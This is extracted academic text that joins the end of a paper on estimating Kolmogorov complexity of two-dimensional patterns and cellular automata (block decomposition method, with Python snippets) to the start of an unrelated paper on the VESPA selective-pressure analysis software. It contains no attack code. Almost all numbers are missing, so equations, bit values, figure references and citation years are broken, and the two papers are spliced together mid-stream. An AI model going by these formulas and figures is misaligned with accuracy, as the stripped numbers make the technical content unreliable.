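    """Space-time diagram of an elementary CA (k=2, r=1) with periodic
    boundaries, started from a single black cell (Wolfram rule numbering)."""
    local = {(a, b, c): (rule >> (a * 4 + b * 2 + c)) & 1
             for a in (0, 1) for b in (0, 1) for c in (0, 1)}
    row = [0] * width
    row[width // 2] = 1
    rows = [row]
    for _ in range(steps):
        prev = rows[-1]
        rows.append([local[(prev[i - 1], prev[i], prev[(i + 1) % width])]
                     for i in range(width)])
    return rows

def partition_complexity(diagram, km2d, d=4):
    """Sum of Km,2D over the d x d patches of the diagram (rows/columns that
    do not complete a patch are simply dismissed here, one of the two
    boundary conventions mentioned in the text).
    km2d: dict mapping each d x d patch to its CTM complexity value."""
    total, height, width = 0.0, len(diagram), len(diagram[0])
    for i in range(0, height - height % d, d):
        for j in range(0, width - width % d, d):
            patch = tuple(tuple(diagram[i + x][j + y] for y in range(d))
                          for x in range(d))
            total += km2d[patch]
    return total
```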
in fact an average eca has a complexity of about k bits, which is quite a large program-size when compared to what we intuitively gauge to be the complexity of each eca, which may suggest that they should have smaller programs. however, one can think of d( , ) d × as attempting to reconstruct the evolution of each eca for the given number of steps with square arrays only bits in size, the complexity of the three square arrays adding up to approximate km, d of the eca rule. hence it is the deployment of d( , ) d × that takes between to k bits to reconstruct every eca space–time evolution depending on how random versus how simple it is. other ways to exploit the data from d( , ) d (e.g., non-square arrays) can be utilized to explore better classifications. we think that constructing a universal distribution from a larger set of turing machines, e.g., d( , ) d × will deliver more accurate results but here we will also introduce a tweak to the definition of the complexity of the evolution of a cellular automaton. splitting eca rules in array squares of size is like trying to look through little windows pixels wide one at a time in order to recognize a face, or training a “microscope” on a planet in the sky. one can do better with the coding theorem method by going further than we have in the calculation of a -dimensional universal distribution (e.g., calculating in full or a sample of d( , ) d × ), but eventually how far this process can be taken is dictated by the computational resources at hand. nevertheless, one should use a telescope where telescopes are needed and a microscope where microscopes are needed. block decomposition method one can think of an improvement in resolution of km, d(c) for growing space–time diagrams of cellular automaton by taking the log (n) of the sum of the arrays where n is the number of repeated arrays, instead of simply adding the complexity of the image patches or arrays. that is, one penalizes repetition to improve the resolution of km, d for larger images as a sort of “optical lens”. this is possible because we know that the kolmogorov complexity of repeated objects grows by log (n), just as we explained with an example in ‘kolmogorov–chaitin complexity’. adding the complexity approximation of each array in the partition matrix of a space–time diagram of an eca provides an upper bound on the eca kolmogorov complexity, as it shows that there is a program that generates the eca evolution picture with the length equal to the sum of the programs generating all the sub-arrays (plus a small value corresponding to the code length to join the sub-arrays). so if a sub-array occurs n times we do not need to consider its complexity n times but log (n). taking into account this, eq. ( ) can be then rewritten as: k′m, dd×d (c t ) =  (ru,nu)∈{ct }d×d km(ru) + log (nu) ( ) zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. where ru are the different square arrays in the partition {c t }d×d of the matrix c t and nu the multiplicity of ru, that is the number of repetitions of d × d-length patches or square arrays found in ct . from now on we will use k′ for squares of size greater than and it may be denoted only by k or by bdm standing for block decomposition method. 
bdm has now been applied successfully to measure, for example, the kolmogorov complexity of graphs and complex networks (zenil et al., ) by way of their adjacency matrices (a d grid) and was shown to be consistent with labelled and unlabelled (up to isomorphisms) graphs. now complexity values of k′m, dd×d range between and k bits with a mean program-size value of about k bits. the classification of eca, according to eq. ( ), is presented in fig. . there is an almost perfect agreement with a classification by lossless compression length (see fig. ) which makes even one wonder whether the coding theorem method is actually providing more accurate approximations to kolmogorov complexity than lossless compressibility for this objects length. notice that the same procedure can be extended for its use on arbitrary images. we denominate this technique block decomposition method. we think it will prove to be useful in various areas, including machine learning as an of kolmogorov complexity (other contributions to ml inspired in kolmogorov complexity can be found in hutter ( )). also worth notice that the fact that eca can be successfully classified by km, d with an approximation of the universal distribution calculated from turing machines (tm) suggests that output frequency distributions of eca and tm cannot be but strongly correlated, something that we had found and reported before in zenil & delahaye ( ) and delahaye & zenil ( b). another variation of the same km, d measure is to divide the original image into all possible square arrays of a given length rather than taking a partition. this would, however, be exponentially more expensive than the partition process alone, and given the results in fig. further variations do not seem to be needed, at least not for this case. robustness of the approximations to m(s) one important question that arises when positing the soundness of the coding theorem method as an alternative to having to pick a universal turing machine to evaluate the kolmogorov complexity k of an object, is how many arbitrary choices are made in the process of following one or another method and how important they are. one of the motivations of the coding theorem method is to deal with the constant involved in the invariance theorem (eq. ( )), which depends on the (prefix-free) universal turing machine chosen to measure k and which has such an impact on real-world applications involving short strings. while the constant involved remains, given that after application of the coding theorem (eq. ( )) we reintroduce the constant in the calculation of k , a legitimate question to ask is what difference it makes to follow the coding theorem method compared to simply picking the universal turing machine. on the one hand, one has to bear in mind that no other method existed for approx- imating the kolmogorov complexity of short strings. on the other hand, we have tried to minimize any arbitrary choice, from the formalism of the computing model to the zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure block decomposition method. all the first ecas (the other are – reverted rules) starting from the simplest (black cell) initial configuration running for t = steps, sorted from lowest to highest complexity according to klog as defined in eq. ( ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
figure top: block decomposing (other boundary conditions are possible and under investigation) the evolution of rule (top) eca after t = steps into subarrays of length × (bottom) in order to calculate km, d × to approximate its kolmogorov complexity. bottom: side by side comparison of evolutions of representative ecas, starting from a random initial configuration, sorted from lowest to highest bdm values (top) and smallest to largest compression lengths using the deflate algorithm as a method to approximate kolmogorov complexity (zenil, ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. informed runtime, when no busy beaver values are known and therefore sampling the space using an educated runtime cut-off is called for. when no busy beaver values are known the chosen runtime is determined according to the number of machines that we are ready to miss (e.g., less than . %) for our sample to be significative enough as described in ‘setting the runtime’. we have also shown in soler-toscano et al. ( ) that approximations to the universal distribution from spaces for which busy beaver values are known are in agreement with larger spaces for which busy beaver values are not known. among the possible arbitrary choices it is the enumeration that may perhaps be questioned, that is, calculating d(n) for increasing n (number of turing machine states), hence by increasing size of computer programs (turing machines). on the one hand, one way to avoid having to make a decision on the machines to consider when calculating a universal distribution is to cover all of them for a given number of n states and m symbols, which is what we have done (hence the enumeration in a thoroughly (n,m) space becomes irrelevant). while it may be an arbitrary choice to fix n and m, the formalisms we have followed guarantee that n-state m-symbol turing machines are in (n + i,m + j) with i,j ≥ (that is, the space of all n + i-state m + j-symbol turing machines). hence the process is incremental, taking larger spaces and constructing an average universal distribution. in fact, we have demonstrated (soler-toscano et al., ) that d( ) (that is, the universal distribution produced by the turing machines with symbols and states) is strongly correlated to d( ) and represents an improvement in accuracy of the string complexity values in d( ), which in turn is in agreement with and an improvement on d( ) and so on. we have also estimated the constant c involved in the invariance theorem (eq. ( )) between these d(n) for n > , which turned out to be very small in comparison to all the other calculated universal distributions (soler-toscano et al., ). real-world evidence we have provided here some theoretical and statistical arguments to show the reliability, validity and generality of our measure, more empirical evidence has also been produced, in particular in the field of cognition and psychology where researchers often have to deal with too short strings or too small patterns for compression methods to be used. for instance, it was found that the complexity of a (one-dimensional) string better predicts its recall from short-term memory that the length of the string (chekaf et al., ). incidentally, a study on the conspiracy theory believers mindset also revealed that human perception of randomness is highly linked to our one-dimensional measure of complex- ity (dieguez, wagner-egger & gauvrit, ). 
concerning the two-dimensional version introduced in this paper, it has been fruitfully used to show how language iterative learning triggers the emergence of linguistic structures (kempe, gauvrit & forsyth, ). a direct link between the perception of two-dimensional randomness, our complexity measure, and natural statistics was also established in two experiments (gauvrit, soler-toscano & zenil, ). these findings further support the complexity metrics presented herein. furthermore, more theoretical arguments have been advanced in soler-toscano et al. ( ) and soler-toscano & zenil ( ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. conclusions we have shown how a highly symmetric but algorithmic process is capable of generating a full range of patterns of different structural complexity. we have introduced this technique as a natural and objective measure of complexity for n-dimensional objects. with two different experiments we have demonstrated that the measure is compatible with lossless compression estimations of kolmogorov complexity, yielding similar results but providing an alternative particularly for short strings. we have also shown that km, d (and km) are ready for applications, and that calculating universal distributions is a stable alternative to compression and a potential useful tool for approximating the kolmogorov complexity of objects, strings and images (arrays). we think this method will prove to do the same for a wide range of areas where compression is not an option given the size of strings involved. we also introduced the block decomposition method. as we have seen with anomalies in the classification such as eca rule (see fig. ), when approaching the complexity of the space–time diagrams of eca by splitting them in square arrays of size , the coding theorem method does have its limitations, especially because it is computationally very expensive (although the most expensive part needs to be done only once—that is, producing an approximation of the universal distribution). like other high precision instruments for examining the tiniest objects in our world, measuring the smallest complexities is very expensive, just as the compression method can also be very expensive for large amounts of data. we have shown that the method is stable in the face of the changes in turing machine formalism that we have undertaken (in this case turmites) as compared to, for example, traditional -dimensional turing machines or to strict integer value program-size com- plexity (soler-toscano et al., ) as a way to estimate the error of the numerical estima- tions of kolmogorov complexity through algorithmic probability. for the turing machine model we have now changed the number of states, the number of symbols and now even the movement of the head and its support (grid versus tape). we have shown and reported here and in soler-toscano et al. ( ) and soler-toscano et al. ( ) that all these changes yield distributions that are strongly correlated with each other up to the point to assert that all these parameters have marginal impact in the final distributions suggesting a fast rate of convergence in values that reduce the concern of the constant involved in the invariance theorem. 
in zenil & delahaye ( ) we also proposed a way to compare approximations to the universal distribution by completely different computational models (e.g., post tag systems and cellular automata), showing that for the studied cases reasonable estimations with different degrees of correlations were produced. the fact that we classify elementary cellular automata (eca) as shown in this paper, with the output distribution of turmites with results that fully agree with lossless compressibility, can be seen as evidence of agree- ment in the face of a radical change of computational model that preserves the apparent order and randomness of turmites in eca and of eca in turmites, which in turn are in full agreement with -dimensional turing machines and with lossless compressibility. we have made available to the community this “microscope” to look at the space of bit strings and other objects in the form of the online algorithmic complexity calculator zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (http://www.complexitycalculator.com) implementing km (in the future it will also implement km, d and many other objects and a wider range of methods) that provides objective algorithmic probability and kolmogorov complexity estimations for short binary strings using the method described herein. raw data and the computer programs to reproduce the results for this paper can also be found under the publications section of the algorithmic nature group (http://www.algorithmicnature.org). additional information and declarations funding the foundational questions institute (fqxi) (fqxi-mga- ) provided support (hz). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: foundational questions institute (fqxi): fqxi-mga- . competing interests the authors declare there are no competing interests. author contributions • hector zenil conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • fernando soler-toscano conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • jean-paul delahaye conceived and designed the experiments, contributed reagents/materials/analysis tools, reviewed drafts of the paper. • nicolas gauvrit analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references andrienko yua, brilliantov nv, kurths j. . complexity of two-dimensional patterns. the european physical journal b—condensed matter and complex systems : – doi . /s . calude cs. . information and randomness. st edition. heidelberg: springer. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. 
Casali AG, Gosseries O, Rosanova M, Boly M, Sarasso S, Casali KR, Casarotto S, Bruno M, Laureys S, Tononi G, Massimini M. A theoretically based index of consciousness independent of sensory processing and behavior. Science Translational Medicine.
Chaitin GJ. On the length of programs for computing finite binary sequences: statistical considerations. Journal of the ACM.
Chekaf M, Gauvrit N, Guida A, Mathy F. Chunking in working memory and its relationship to intelligence. In: Proceedings of the Annual Meeting of the Cognitive Science Society, Pasadena, California.
Cilibrasi R, Vitanyi P. Clustering by compression. IEEE Transactions on Information Theory.
Cook M. Universality in elementary cellular automata. Complex Systems.
Cover TM, Thomas JA. Information Theory. 2nd edition. New Jersey: J. Wiley and Sons.
Delahaye J-P, Zenil H. (a) Towards a stable definition of Kolmogorov–Chaitin complexity. arXiv preprint.
Delahaye J-P, Zenil H. (b) On the Kolmogorov–Chaitin complexity for short sequences. In: Calude C, ed. Randomness and Complexity: From Leibniz to Chaitin. Singapore: World Scientific.
Delahaye J-P, Zenil H. Numerical evaluation of the complexity of short strings: a glance into the innermost structure of algorithmic randomness. Applied Mathematics and Computation.
Dieguez S, Wagner-Egger P, Gauvrit N. "Nothing happens by accident", or does it? A low prior for randomness does not explain belief in conspiracy theories. Psychological Science.
Feldman DP. Some foundations in complex systems: entropy, information, computation, and complexity. Beijing: Santa Fe Institute's annual complex systems summer school.
Feldman DP, Crutchfield JP. Structural information in two-dimensional patterns: entropy convergence and excess entropy. Physical Review E.
Gardner M. Mathematical games—the fantastic combinations of John Conway's new solitaire game "Life". Scientific American.
Gauvrit N, Soler-Toscano F, Zenil H. Natural scene statistics mediate the perception of image complexity. Visual Cognition.
Hutter M. On the existence and convergence of computable universal priors. In: Proceedings of the International Conference on Algorithmic Learning Theory (ALT), Lecture Notes in Artificial Intelligence. Sapporo/Berlin: Springer.
Joosten J. Turing machine enumeration: NKS versus lexicographical. Wolfram Demonstrations Project. Available at http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/.
Kempe V, Gauvrit N, Forsyth D. Structure emerges faster during cultural transmission in children than in adults. Cognition.
Kircher W, Li M, Vitanyi P. The miraculous universal distribution. The Mathematical Intelligencer.
Kolmogorov AN. Three approaches to the quantitative definition of information. Problems of Information and Transmission.
Langton CG. Studying artificial life with cellular automata. Physica D: Nonlinear Phenomena.
Levin L. Laws of information conservation (non-growth) and aspects of the foundation of probability theory. Problems of Information and Transmission.
Li M, Vitányi P. An Introduction to Kolmogorov Complexity and Its Applications. 3rd edition. Heidelberg: Springer.
Pegg Jr E. Math Puzzle. Available at http://www.mathpuzzle.com/ mar .html (accessed June).
Radó T. On non-computable functions. Bell System Technical Journal.
Rivals É, Dauchet M, Delahaye J-P, Delgrange O. Compression and genetic sequence analysis. Biochimie.
Shalizi CR, Shalizi KL, Haslinger R. Quantifying self-organization with optimal predictors. Physical Review Letters.
Soler-Toscano F, Zenil H. A computable measure of algorithmic probability by finite approximations. arXiv preprint.
Soler-Toscano F, Zenil H, Delahaye J-P, Gauvrit N. Correspondence and independence of numerical evaluations of algorithmic information measures. Computability.
Soler-Toscano F, Zenil H, Delahaye J-P, Gauvrit N. Calculating Kolmogorov complexity from the frequency output distributions of small Turing machines. PLoS ONE.
Solomonoff RJ. A formal theory of inductive inference: Parts I and II. Information and Control.
Wolfram S. A New Kind of Science. Champaign: Wolfram Media.
Young K, Du A-T, Kramer J, Rosen H, Miller B, Weiner M, Schuff N. Patterns of structural complexity in Alzheimer's disease and frontotemporal dementia. Human Brain Mapping.
Young K, Schuff N. Measuring structural complexity in brain images. NeuroImage.
Zenil H. Compression-based investigation of the dynamical properties of cellular automata and other systems. Complex Systems.
Zenil H. Une approche expérimentale à la théorie algorithmique de la complexité. Dissertation in fulfilment of the degree of Doctor in Computer Science, Université de Lille.
Zenil H, Delahaye J-P. On the algorithmic nature of the world. In: Dodig-Crnkovic G, Burgin M, eds. Information and Computation. Singapore: World Scientific Publishing Company.
Zenil H, Kiani N, Tegnér J. A probabilistic algorithmic information approach to quantify loss of information of network-based dimensionality reduction techniques. Journal of Complex Networks, in press.
Zenil H, Soler-Toscano F, Dingle K, Louis A. Correlation of automorphism group size and topological properties with program-size complexity evaluations of graphs and complex networks. Physica A: Statistical Mechanics and its Applications.

Submitted March; accepted May; published June.
Corresponding author: Mary J. O'Connell, m.oconnell@leeds.ac.uk
Academic editor: James Procter
Additional information and declarations can be found at the end of the article.
Copyright Webb et al. Distributed under Creative Commons CC-BY.
Open Access
VESPA: Very large-scale Evolutionary and Selective Pressure Analyses
Andrew E. Webb, Thomas A. Walsh and Mary J. O'Connell
Bioinformatics and Molecular Evolution Group, School of Biotechnology, Faculty of Science and Health, Dublin City University, Dublin, Ireland
Computational and Molecular Evolutionary Biology Group, School of Biology, Faculty of Biological Sciences, The University of Leeds, Leeds, United Kingdom

Abstract
Background. Large-scale molecular evolutionary analyses of protein-coding sequences require a number of preparatory, inter-related steps, from finding gene families to generating alignments and phylogenetic trees and assessing selective pressure variation. Each phase of these analyses can represent a significant challenge, particularly when working with entire proteomes (all protein-coding sequences in a genome) from a large number of species.
Methods. We present VESPA, software capable of automating a selective pressure analysis using codeml in addition to the preparatory analyses and summary statistics. VESPA is written in Python and Perl and is designed to run within a Unix environment.
Results. We have benchmarked VESPA and our results show that the method is consistent, performs well on both large-scale and smaller-scale datasets, and produces results in line with previously published datasets.
Discussion. Large-scale gene family identification, sequence alignment, and phylogeny reconstruction are all important aspects of large-scale molecular evolutionary analyses. VESPA provides flexible software for simplifying these processes along with downstream selective pressure variation analyses. The software automatically interprets results from codeml and produces simplified summary files to assist the user in better understanding the results. VESPA may be found at the following website: http://www.mol-evol.org/vespa.

Subjects: Bioinformatics, Computational Biology
Keywords: selective pressure analysis, protein molecular evolution, large-scale comparative genomics, gene family evolution, positive selection

Introduction
Estimating selective pressure variation across homologous protein-coding genes from different species is typically done by assessing the ratio dN/dS, i.e., the number of non-synonymous substitutions per non-synonymous site (dN) as a function of the number of synonymous substitutions per synonymous site (dS). The ratio dN/dS is commonly referred to as omega (ω) and is routinely used to assess selective pressure variation or constraints across protein families or protein-interaction networks (Kim, Korbel & Gerstein; Kosiol et al.; Alvarez-Ponce, Aguade & Rozas). These calculations of selective pressure variation are performed on alignments of protein-coding sequences (and not on other data types such as raw reads from NGS experiments).
the models available in paml for assessing selective pressure variation can simultaneously compare variation across sites and across lineages in the homologous protein coding gene dataset. in this way the ‘‘foreground lineage’’ is compared to all other lineages in the dataset in an attempt to determine lineage specific selective pressure variation. some well-known examples of selective pressure variation on foreground lineages include the identification of positive selection in reproductive proteins that contribute to species divergence in mammals (swanson et al., ), and the identification of molecular signatures of positive selection that govern protein functional divergence in a group of mammal enzymes (loughran et al., ). a number of software packages estimate selective pressure variation (pond, frost & muse, ; yang, ; delport et al., ). one of the most popular methods is codeml from the paml software package (yang, ). the strength of this approach is the application of flexible codon-based models capable of assessing variation in selective pressures at two levels: (i) across sites in an alignment and (ii) across sites in a predefined, or ‘‘foreground’’ lineage on a phylogenetic tree (yang & dos reis, ). operating codeml requires a complex file structure to compute the parameters under multiple nested models. associated likelihood ratio tests (lrts) must also be performed in the identification of the model of best fit. these complexities are often compounded by the size of study, which increasingly are genomic in scale (liu et al., ; keane et al., ; webb et al., ). other approaches to streamline the process of applying codon-based models of evolution to homologous sequences sets focus on site-specific models such as potion (hongo et al., ). to address these issues we have designed vespa (very large-scale evolutionary and selective pressure analyses). vespa automates selective pressure analyses and associated prerequisite analyses and post-analysis summary statistics. vespa can perform both lineage-site specific and site-specific analyses whereas potion presently performs the site-specific analyses. therefore, vespa is unique in its capacity to perform the complex set of tasks involved in assessing lineage specific selective pressure variation across homologous gene families and across lineages. vespa minimizes the majority of data manipulation requirements for standard molecular evolutionary analyses and also automatically implements and analyzes selective pressure variation analyses using codeml (yang, ). in addition, vespa supplies an assessment of potential false positives and produces summary files of the results that are easy to interpret. vespa allows the user to take advantage of the wealth of publically available genomic data from model and non-model organisms to perform large-scale analyses of homology searching, alignment, phylogeny reconstruction and selective pressure variation. all that vespa requires is the protein coding dna sequences, which it will translate with the standard genetic code and use to search and construct gene family alignments. this flexible toolkit can permit large-scale analyses to be performed in an efficient manner and with fewer errors. webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table overview of the phases in the vespa software package. 
phase / purpose | supported input type | supported file formats
data preparation | protein coding dna sequences (a) | fasta
homology searching | blast/hmmer output files | blast tabular, hmmer standard
alignment assessment and phylogeny reconstruction | multiple sequence alignments (a) | fasta, nexus, phylip
selective pressure analysis preparation | gene phylogenies (or species phylogenies) with corresponding multiple sequence alignments (a) | trees: newick, nexus; alignments: see above
selective pressure analysis assessment | standard codeml output files generated directly by the software | vespa formatted codeml output
notes. (a) indicates phases of vespa that incorporate third-party programs. the file formats required as input for each phase of vespa are detailed. the numbering scheme is consistent with the numbering scheme for the phases as displayed in figs. and .
methods
vespa helps automation by preparing input data files and processing results, but program executions are initiated by the user (e.g., via submission to an hpc queuing system). vespa has five major phases (table and fig. ), each of which is composed of a number of functions. vespa was developed as a toolkit of various independent functions within each phase, and the primary goal is to simplify the procedures involved in large-scale selective pressure variation analyses. each function either completes a specific phase of the analysis (e.g., homologous gene identification) or facilitates/automates the use of third-party software packages to complete more specialized procedures. the majority of functions are written in python . and are designed to operate on a unix command line. functions are categorized as either basic or advanced; e.g., the function to identify single gene orthologs is a basic function, whereas confirming both sgos and multi-gene families (mgfs) is an advanced function (fig. ). this structure also provides users with a flexible and adaptable framework for more specialist tasks. for an in-depth description and format requirements, please see the program manual, tutorials and documentation published on the program website (http://www.mol-evol.org/vespa). depending on the phase of vespa, input is accepted from any program capable of producing the supported file format(s) or a selected collection of third-party programs (table ). for example, phase (the homology searching phase) currently parses the output of blast (altschul et al., ) or hmmer (eddy, ), whereas the alignment assessment and phylogeny reconstruction phase is limited only by file format requirements (e.g., fasta, nexus, phylip). functions in vespa are invoked following the program call (i.e., vespa.py) along with arguments to indicate the phase-relevant input data and function-specific optional arguments. depending on the function, optional arguments enable users to modify parameter values (e.g., blast search thresholds, phylogenetic reconstruction settings) or alter command-specific settings.
figure overview of the phases implemented in vespa. the five phases of vespa are listed from ''data preparation'' to ''selective pressure analysis assessment''. underneath each is a grey box enclosing some representative commands from that phase. each phase concludes with a black box indicating the use of a third-party program to perform the necessary task (e.g., sequence alignment or phylogenetic reconstruction).
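as noted above, the homology-searching phase consumes blast tabular (or hmmer) output produced outside vespa. the sketch below is a generic illustration of reading the standard 12-column blast tabular format and keeping the best-scoring hit per query; it is not vespa's own parser, and the file name and e-value threshold are hypothetical.

```python
def best_hits(blast_tabular_path, max_evalue=1e-5):
    """Return the highest bit-score hit per query from BLAST tabular (-outfmt 6) output."""
    best = {}
    with open(blast_tabular_path) as handle:
        for line in handle:
            fields = line.rstrip("\n").split("\t")
            query, subject = fields[0], fields[1]
            evalue, bitscore = float(fields[10]), float(fields[11])
            if evalue > max_evalue:
                continue  # skip weak hits
            if query not in best or bitscore > best[query][1]:
                best[query] = (subject, bitscore)
    return best

# Hypothetical file produced by a BLAST search against a VESPA-formatted database.
# hits = best_hits("species_a_vs_species_b.tsv")
```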
the output of the first four phases is then used as the input of the next phase. the final phase is written in perl and concludes with the creation of summary files that contain all the relevant information from the selective pressure analyses. webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of the options available in the vespa package. an overview of the basic and ad- vanced analysis options at each of the five phases of vespa. the functions of each phase are shown as white boxes, and are invoked in the order shown (note: that not all functions are shown here; a complete set of vespa functions are available in the manual). within each phase the available alternatives for pro- cessing the data are given on the left and right hand columns. these only vary for phase and . the left most column may represent the processing of single gene orthologs that you wish to impose the species tree onto. if this is the case then vespa will allow you to generate the phylogenies from the species tree (as shown on the left most side of (c)). (continued on next page...) webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (...continued) however, you may wish to generate gene trees directly from the data for either multigene families or for single gene families of uncertain orthology (this option is shown on the right most column in (c) and in- volves selecting the substitution model of best fit and reconstructing the phylogeny). in addition to the functions, the input and output of each phase are shown in dark grey boxes and if a third-party program is required to analyze the output of the phase, the program is specified below the phase in a light grey box. for three of the five phases (data preparation, homology searching, and selective pressure analysis assess- ment) the functions invoked in both the basic and advanced options are identical. the primary difference between the analyses (basic/advanced) is found in the alignment assessment and phylogeny reconstruction phase. the advanced option uses prottest (darriba et al., ) for substitution model selection and mr- bayes (ronquist & huelsenbeck, ) for phylogenetic reconstruction. beyond this major difference, the selective pressure analysis preparation simply requires a function to import the output of mrbayes. functions in vespa complete by producing the relevant output files without modifying the original input files. while this design results in the generation of a number of intermediate files (especially in the later stages of selection analysis), it enables users to easily keep track of all data modifications. each phase of vespa’s analysis produces the necessary data files for conducting a specialized analysis using third-party software (fig. ). homology searches in particular are not fully automated by vespa for two reasons: (i) they are best run as individual serial tasks on large high-end computing clusters, or (ii) the submission processes differ across compute clusters. however, vespa can generate the blast formatted database for subsequent homology searches. all vespa commands are issued on the command line and are readily executable via a cluster scheduling system. results as detailed above, vespa incorporates two analyses, a basic analysis for analyzing sgos and an advanced analysis for analyzing both sgos and mgfs (fig. ). 
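one of the early steps in the basic-analysis walkthrough that follows is reciprocal_groups, which identifies proteins that share reciprocal similarity. a simplified two-proteome sketch of that idea (not the vespa implementation) keeps only pairs of sequences that are each other's best hit; the dictionaries below, mapping each query to its best subject and bit score, are hypothetical.

```python
def reciprocal_best_hits(best_a_vs_b, best_b_vs_a):
    """Return (protein_a, protein_b) pairs that are each other's best hit."""
    pairs = []
    for protein_a, (protein_b, _score) in best_a_vs_b.items():
        match = best_b_vs_a.get(protein_b)
        if match is not None and match[0] == protein_a:
            pairs.append((protein_a, protein_b))
    return pairs

# Hypothetical best-hit dictionaries: query -> (best subject, bit score).
a_vs_b = {"a1": ("b7", 210.0), "a2": ("b3", 95.0)}
b_vs_a = {"b7": ("a1", 205.0), "b3": ("a9", 120.0)}
print(reciprocal_best_hits(a_vs_b, b_vs_a))  # [('a1', 'b7')]
```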
here we provide an example of an application of the basic analysis using ten genes from eleven species as a small test dataset. as seen in fig. , the process begins with the user supplying transcript data for the data preparation phase. the first phase begins with the clean function, a basic quality control (qc) filtering step, followed by translate, to translate the filtered transcripts. vespa then proceeds to the make_database function to create a sequence database for homology searching with either blast (altschul et al., ) or hmmer (eddy, ). upon completion of homology searching, the function reciprocal_groups is used to identify proteins that share reciprocal similarity. then, files containing these families of sequences are produced. this function is highly configurable by optional arguments so that users can evaluate various different similarity scenarios (i.e., different e-value cutoffs) with only a single output file. the produced sequences files are then aligned using any multiple sequence alignment (msa) method that can produce a supported file format (e.g., programs such as muscle (edgar, ) and prank (loytynoja & goldman, ) are supported). it is advisable to explore a variety of msa methods for every gene family (muller et al., ), and vespa facilitates this the user to compare these different approaches. the metal_compare function (within the alignment assessment and phylogeny reconstruction phase) in vespa allows alignment approaches to be compared and a single msa of webb et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. best fit is retained for each gene family (i.e., gene family a may have an msa from muscle while gene family b may have an msa from prank). msas for each sgo family can then used in combination with the user-defined species phylogeny to create gene phylogenies using the function infer_genetrees or gene trees can be generated directly from the msas the msas and gene phylogenies are then used for the selective pressure analysis preparation phase. the function create_branch can be used to specifically label internal nodes as ancestral lineages that the user may wish to explore. the msas and gene phylogenies are then used by the function setup_codeml to automatically create the complex codeml file structure and a task file for automating codeml (yang, ). upon completion of codeml the codeml_reader function is used to automate the interpretation of the results and producing summary files of the results. vespa creates a number of output files for each homologous gene family detailing the results of the codeml analysis. there are two primary types of output files for each gene family tested: ( ) a single csv formatted summary text file (shown in table ) for one gene family, and ( ), a multiple sequence alignment for each model tested detailing the sites (protein/codon) proposed to be under positive selection (this is also provided in html format so it can be viewed with colour coding for ease of interpretation). to compare the results of vespa to other pipelines and predictions of positive selection, we used a dataset of gene families from the selectome database (moretti et al., ). a tarball of the data and results of the vespa analysis of gene families (i.e., input sequences, alignments, trees, codeml output, vespa summary at each phase) have been provided in file s . selectome is a publicly available database of genes under positive selection. 
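the per-gene-family csv summary files just described are easy to post-process. as a hedged illustration, the sketch below collects the families for which any tested model reported positive selection; the column name "positive_selection" and the file names are hypothetical stand-ins, not necessarily the exact headers and names written by codeml_reader.

```python
import csv

def families_under_positive_selection(summary_paths):
    """Collect gene-family summaries that report positive selection for at least one model."""
    selected = []
    for path in summary_paths:
        with open(path, newline="") as handle:
            rows = csv.DictReader(handle)
            if any(row.get("positive_selection", "").strip().lower() == "yes" for row in rows):
                selected.append(path)
    return selected

# Hypothetical summary files, one per gene family.
# print(families_under_positive_selection(["atg4l_summary.csv", "pask_summary.csv"]))
```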
selectome was chosen to provide this benchmark dataset as it permits direct access to all relevant files used in its calculations, and it also uses the codon based models of evolution implemented in codeml and integrated in vespa, facilitating a direct comparison of results. we carried out two tests with the dataset from selectome (release ) (moretti et al., ). first, we wished to assess whether the way in which vespa automatically sets up all codon models, labeling of foreground lineages and lrts produced results comparable with those from the selectome pipeline. to this end, we ran vespa using the masked dna alignments and gene trees for each of the homologous gene families from the selectome database. vespa produced identical results for these input alignments. this demonstrates that vespa's automation of the process is reliable and robust. one challenge in performing these analyses is that different alignment methods applied to the same gene families can produce different results. vespa provides the ''metal_compare'' function, which allows alignments for a gene family to be compared. to highlight its utility, we performed an additional test on this dataset of homologous gene families from selectome. we used the unmasked sequences, generated a set of alternative alignments with muscle (edgar, ) and prank (loytynoja & goldman, ), and used the metal_compare function of vespa to identify the best (i.e., most statistically significant) alignment for each gene family. the vespa functions 'setup_codeml' and 'codeml_reader' were then used to automate the codeml set-up and analysis. the vespa pipeline was able to replicate the lineages identified as under positive selection in the selectome database.
